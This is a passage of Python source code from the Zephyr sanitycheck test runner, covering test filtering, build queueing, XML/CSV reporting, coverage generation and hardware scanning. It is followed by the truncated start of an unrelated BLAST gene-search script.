logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
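    # Walk the testcase roots looking for sample.yaml/testcase.yaml files and
    # build TestCase objects from every test entry found in them.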
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
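    # Re-create test instances from a previously written CSV report,
    # skipping rows whose status is listed in filter_status.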
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
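        # Cross every testcase with every candidate platform and drop the combinations that
        # fail the command-line or per-testcase filters below. Returns a dictionary mapping
        # each discarded TestInstance to the reason it was discarded.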
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
            # When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if device_testing_filter:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
                        aa = list(filter(lambda inst: inst.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
                    instances = list(filter(lambda inst: inst.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
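        # Feed one work item per selected instance into the shared pipeline queue: "run"
        # operations when only re-running already built tests, "cmake" operations otherwise.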
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped', 'error']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
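        # Drive the build/run pipeline: a feeder future queues the work items, worker futures
        # hand each incoming message to a ProjectBuilder, and, when a size report is requested,
        # RAM/ROM metrics are collected for the built binaries afterwards.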
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
                    # fetch the next work item from the pipeline queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
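        # Write a CSV listing every discarded test/platform combination and the reason it
        # was filtered out; apply_filters() must have been run first.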
try:
if not self.discards:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
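        # Emit a JUnit-style XML report with one <testsuite> element per platform. With
        # full_report, every individual sub-case gets its own <testcase> entry; otherwise one
        # entry is written per test instance. Existing results are updated when append is set.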
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skip'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
                        # remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS':
pass
elif instance.results[k] == 'SKIP':
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
                    # remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
            t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
    def retrieve_gcov_data(input_file):
        logger.debug("Working on %s" % input_file)
        extracted_coverage_info = {}
        capture_data = False
        capture_complete = False
        with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
            # gcovr fails if kobject_hash is included in the coverage data,
            # so skip it (this is only a problem with gcovr v4.1)
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
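        # Reconstruct .gcda files from every handler.log found under outdir, then call the
        # tool-specific _generate() implementation to produce the HTML coverage report.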
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
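        # Enumerate connected serial devices from the supported manufacturers and guess the
        # matching flash/debug runner from the USB product string.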
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
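        # Merge newly detected boards into an existing hardware map file (marking entries that
        # are no longer attached as disconnected), or create a fresh map if none exists.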
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
self.detected.sort(key=lambda x: x['serial'] or '')
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product'] and not h['connected'] and not d.get('match', False):
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
GeneSeekr_tblastx.py
|
#!/usr/bin/env python3
from olctools.accessoryFunctions.accessoryFunctions import printtime, run_subprocess, write_to_logfile, make_path, \
combinetargets, MetadataObject, GenObject, make_dict
from genemethods.assemblypipeline.GeneSeekr import GeneSeekr
from Bio.Blast.Applications import NcbitblastxCommandline
from Bio.Application import ApplicationError
from Bio.pairwise2 import format_alignment
from Bio.SeqRecord import SeqRecord
from Bio import pairwise2
from Bio.Seq import Seq
from Bio import SeqIO
from threading import Thread
from csv import DictReader
from glob import glob
import xlsxwriter
import time
import csv
import sys
import os
import re
__author__ = 'adamkoziol'
class GeneSeekr_tblastx(GeneSeekr):
def geneseekr(self):
# Make blast databases (if necessary)
printtime('Creating {} blast databases as required'.format(self.analysistype), self.start)
self.makedbthreads()
# Run the blast analyses
printtime('Running {} blast analyses'.format(self.analysistype), self.start)
self.blastxthreads()
if self.unique:
self.filterunique()
if self.analysistype == 'resfinder':
self.resfinderreporter()
elif self.analysistype == 'virulence':
self.virulencefinderreporter()
else:
self.reporter()
# Remove the attributes from the object; they take up too much room on the .json report
for sample in self.metadata:
delattr(sample[self.analysistype], "targetnames")
delattr(sample[self.analysistype], "targets")
printtime('{} analyses complete'.format(self.analysistype), self.start)
def blastxthreads(self):
"""Setup and create threads for blastn and xml path"""
# Create the threads for the BLAST analysis
for i in range(self.cpus):
threads = Thread(target=self.runblast, args=())
            threads.daemon = True
threads.start()
# Populate threads for each gene, genome combination
for sample in self.metadata:
